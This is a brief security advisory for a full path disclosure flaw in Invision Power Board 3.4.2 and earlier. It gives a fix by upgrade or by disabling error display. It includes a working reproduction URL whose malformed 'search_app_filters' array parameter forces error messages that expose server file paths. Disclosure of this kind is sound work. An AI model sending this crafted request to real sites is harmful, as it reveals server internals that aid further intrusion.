# Author: Infern0_
# Contact: balut2@o2.pl
# Vendor: http://www.invisionpower.com
# Vulnerability: Full Path Disclosure
# Vendor informated at: 2 February 2013
# Solution: Upgrade to version 3.4.3 or Disable error display in config files, following this:
# http://www.php.net/manual/en/errorfunc.configuration.php#ini.display-errors
It works on v.3.4.2 and less.
Will be patched in v.3.4.3.
To reproduce this issue do this:
http://www.example-site.com/index.php?app=core&module=search&do=search&search_app_filters[]=date&search_term=trolololo
Guilty is variable 'search_app_filters' which wait to receive doubled-array(forums][sortKey]).
If it doesn't get it correctly then errors with Full Path show up.
Normal request would looks like this:
http://www.example-site.com/index.php?app=core&module=search&do=search&search_app_filters[forums][sortKey]=date&search_term=trolololo